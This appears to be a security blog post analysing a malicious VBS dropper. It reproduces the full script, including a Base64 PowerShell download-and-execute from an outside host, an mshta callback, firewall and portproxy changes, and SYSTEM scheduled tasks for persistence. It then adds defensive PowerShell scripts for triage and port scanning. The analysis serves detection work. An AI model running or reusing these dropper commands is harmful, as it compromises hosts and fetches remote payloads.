Hacker Notes 71: the strange port 65533 in tmp.vbs



The contents of tmp.vbs are as follows:

Set ws = CreateObject("WScript.Shell")
ws.Run "cmd.exe /c echo BoYzlCN >> c:\windows\temp\svchost.exe&echo ""*"" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\nGYN.exe&move /y c:\windows\temp\dig.exe c:\windows\MdakZaGM.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn ""\Microsoft\windows\Bluetool"" /tr ""powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn nGYN /tr ""C:\Windows\nGYN.exe"" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn ""\wKGEloX"" /tr ""c:\windows\MdakZaGM.exe"" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr ""cmd.exe /c mshta w.beahh.com/page.html?p… /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr ""c:\windows\MdakZaGM.exe""&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr ""c:\windows\nGYN.exe""&schtasks /run /TN escan)",0
Set ws = CreateObject("WScript.Shell")
ws.Run "c:\windows\temp\setup-install.exe",0

The script actually touches quite a few intermediate files along the way:

echo BoYzlCN >> c:\windows\temp\svchost.exe

echo "*" >c:\windows\temp\hash.txt

netsh firewall add portopening tcp 65533 DNSd

netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53

copy /y c:\windows\temp\svchost.exe c:\windows\nGYN.exe

move /y c:\windows\temp\dig.exe c:\windows\MdakZaGM.exe

ws.Run "c:\windows\temp\setup-install.exe",0

Below is the scheduled-task creation part, already broken out into separate lines:

if exist C:/windows/system32/WindowsPowerShell/ (
    schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
    schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn nGYN /tr "C:\Windows\nGYN.exe" /F
    schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\wKGEloX" /tr "c:\windows\MdakZaGM.exe" /F
) else (
    start /b sc start Schedule
    ping localhost
    sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f
    schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"
    schtasks /run /TN Autocheck
    start /b sc start Schedule
    ping localhost
    sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f
    schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\MdakZaGM.exe"
    schtasks /run /TN Autostart
    start /b sc start Schedule
    ping localhost
    sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f
    schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\nGYN.exe"
    schtasks /run /TN escan
)

Every 50 minutes it runs a PowerShell command that bypasses the execution policy (-ep bypass) and executes a Base64-encoded command.

Every 10 minutes it runs C:\Windows\nGYN.exe.

Every 10 minutes it runs c:\windows\MdakZaGM.exe.
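As an added example (not from the original post), here is a host-side triage script that looks for the artefacts this dropper leaves behind: the netsh portproxy rule, the inbound firewall rule named DNSd, live listeners on the port ranges, the scheduled tasks by name (plus any task whose PowerShell action carries -ep bypass or an -e Base64 argument, which it decodes), and the dropped files. The task names, file paths, rule name and port ranges come from the script above; the checking logic and its layout are assumed. Run it from an elevated PowerShell on the suspect host.

```powershell
# Added example, not part of the original post: host-side triage for the
# persistence artefacts the tmp.vbs dropper leaves behind.
# Indicator values (task names, paths, rule name, port ranges) come from the
# post; the checking logic itself is an assumption about how to verify them.

$SuspectPorts = @(65529..65533) + @(49152..49158) + @(49664..49670)
$SuspectTasks = 'Bluetool', 'nGYN', 'wKGEloX', 'Autocheck', 'Autostart', 'escan'
$SuspectFiles = 'C:\Windows\nGYN.exe', 'C:\Windows\MdakZaGM.exe',
                'C:\Windows\Temp\svchost.exe', 'C:\Windows\Temp\dig.exe',
                'C:\Windows\Temp\hash.txt', 'C:\Windows\Temp\setup-install.exe'
$Findings = [System.Collections.Generic.List[string]]::new()

# 1. portproxy rules persist in the registry ("netsh interface portproxy show all"
#    reads the same key). Value name = "<listenaddr>/<listenport>",
#    data = "<connectaddr>/<connectport>". A clean server normally has none.
$proxyKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
if (Test-Path $proxyKey) {
    foreach ($p in (Get-ItemProperty -Path $proxyKey).PSObject.Properties) {
        if ($p.Name -match '^[^/]+/\d+$') {
            $Findings.Add("portproxy: listen $($p.Name) -> $($p.Value)")
        }
    }
}

# 2. Inbound allow rule: the legacy "netsh firewall add portopening" call names it DNSd.
Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
    ForEach-Object {
        $rule   = $_
        $filter = $rule | Get-NetFirewallPortFilter
        if ($filter.Protocol -ne 'TCP') { return }
        foreach ($lp in @($filter.LocalPort)) {
            $n = $lp -as [int]   # 'Any' and ranges such as '49152-65535' cast to $null
            if ($rule.DisplayName -eq 'DNSd' -or ($n -and $SuspectPorts -contains $n)) {
                $Findings.Add("firewall: '$($rule.DisplayName)' allows tcp/$lp")
            }
        }
    }

# 3. Live listeners. A portproxy listener is owned by the IP Helper service
#    (iphlpsvc inside svchost.exe), so the owning process looks benign;
#    the port number is the tell, not the process name.
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $SuspectPorts -contains $_.LocalPort } |
    ForEach-Object {
        $proc = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        $Findings.Add("listener: tcp/$($_.LocalPort) pid $($_.OwningProcess) ($proc)")
    }

# 4. Scheduled tasks: match the dropper's names, flag -ep bypass, and decode any
#    "-e <base64>" PowerShell argument (UTF-16LE) so the real command is visible.
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($a in @($task.Actions)) {
        $args = [string]$a.Arguments
        $cmd  = "$($a.Execute) $args"
        $b64  = if ($args -match '(?i)\s-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') { $Matches[2] } else { $null }
        $byName = $SuspectTasks -contains $task.TaskName
        if ($byName -or $b64 -or $args -match '(?i)-ep\s+bypass') {
            if ($b64) {
                try { $cmd += ' | decoded: ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64)) }
                catch { $cmd += ' | decoded: <invalid base64>' }
            }
            $Findings.Add("task: $($task.TaskPath)$($task.TaskName) -> $cmd")
        }
    }
}

# 5. Dropped binaries and marker files, hashed for the incident record.
foreach ($f in $SuspectFiles) {
    if (Test-Path -LiteralPath $f) {
        $hash = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
        $Findings.Add("file: $f sha256=$hash")
    }
}

if ($Findings.Count -eq 0) { Write-Output 'No artefacts from this dropper found.' }
else { $Findings | ForEach-Object { Write-Warning $_ } }
```

Step 3 is the one worth remembering: because the 65533 listener is created by netsh portproxy, the socket belongs to the IP Helper service rather than to nGYN.exe or MdakZaGM.exe, so a process-name based check will miss it while the registry key in step 1 and the port itself will not.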

I looked it up: ports 65529-65533, 49152-49158 and 49664-49670 are all ports that the EternalBlue trojan will try to open.

So the idea is to monitor whether any Windows servers on the intranet have these ports open; if some do, they are most likely infected now or were infected at some point.
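As an added example (not from the original post), here is one way to run that check against your own server inventory from PowerShell: a short TCP connect test with a timeout, applied to every host and every port in the three ranges above. The host list is a constructed placeholder; the port ranges are the ones the post names.

```powershell
# Added example, not part of the original post: sweep an inventory of your own
# Windows servers for listeners on the port ranges the post lists.
$SuspectPorts = @(65529..65533) + @(49152..49158) + @(49664..49670)
$Inventory    = 'srv-file01.example.internal', '10.0.0.21'   # constructed placeholder list

function Test-TcpListener {
    # Returns $true only if a full TCP handshake completes within the timeout.
    param([string]$ComputerName, [int]$Port, [int]$TimeoutMs = 500)
    $client = [System.Net.Sockets.TcpClient]::new()
    try {
        $ar = $client.BeginConnect($ComputerName, $Port, $null, $null)
        if (-not $ar.AsyncWaitHandle.WaitOne($TimeoutMs)) { return $false }  # filtered / no answer
        $client.EndConnect($ar)   # throws if the port was refused
        return $true
    }
    catch   { return $false }
    finally { $client.Dispose() }
}

$hits = foreach ($h in $Inventory) {
    foreach ($p in $SuspectPorts) {
        if (Test-TcpListener -ComputerName $h -Port $p) {
            [pscustomobject]@{ Host = $h; Port = $p }
        }
    }
}

if ($hits) { $hits | Sort-Object Host, Port | Format-Table -AutoSize }
else       { Write-Output 'No suspect ports open on the inventory hosts.' }
```

A caveat when reading the results: 49152-49158 and 49664-49670 fall inside the default Windows dynamic port range, and RPC services on ordinary domain-joined servers routinely bind there, so a hit in those ranges alone is weak evidence and needs the host-side checks above to confirm. 65529-65533 sit at the very top of the range and are almost never used by default, so a listener there is the stronger signal, which is also why the post singles out 65533.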